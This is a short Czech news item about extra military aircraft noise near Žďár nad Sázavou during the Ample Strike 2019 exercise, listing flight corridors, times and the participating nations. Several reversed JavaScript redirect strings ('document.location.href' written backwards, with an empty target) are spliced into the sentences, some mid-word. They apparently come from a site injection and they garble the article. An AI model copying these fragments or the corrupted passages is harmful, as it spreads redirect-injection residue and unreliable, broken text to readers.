Rainbow page separator

Zvýšená hluková zátěž od vojenské techniky potrvá do 20. září

Neděle, 8. září 2019

Žďár nad Sázavou / V současných dnech, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to až do 20. září, se obyvatelé Žďáru musí smířit se zvýšenou hladinou hluku v souvislosti s leteckým provozem v rámci mezinárodního vojenského taktického cvičení Ample Strike 2019.
Letecké koridory Armáda Česká republiky vytyčila přibližně pět kilometrů severovýchodně a deset kilometrů jihovýchodně od Žďáru nad Sázavou. Nejvíce přeletů vojenské techniky, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zejména startující a dosedající na letiště ve Vícenicích u Náměště nad Oslavou, je naplánováno do 13. září v době od devíti do třiadvaceti hodin. Noční lety se armáda pokusí omezit na nezbytné minimum.
Mimo příslušníků Armády České republiky se při le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním vojenském cvičení aktivně angažují vojáci armád Maďarska, Německa, Slovenska, Velké Británie a USA. Aliančního cvičení se zúčastní méně vojáků než loni, kdy jich bylo přes tisícovku, zatímco v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce je jejich počet přibližně o čtvrtinu menší.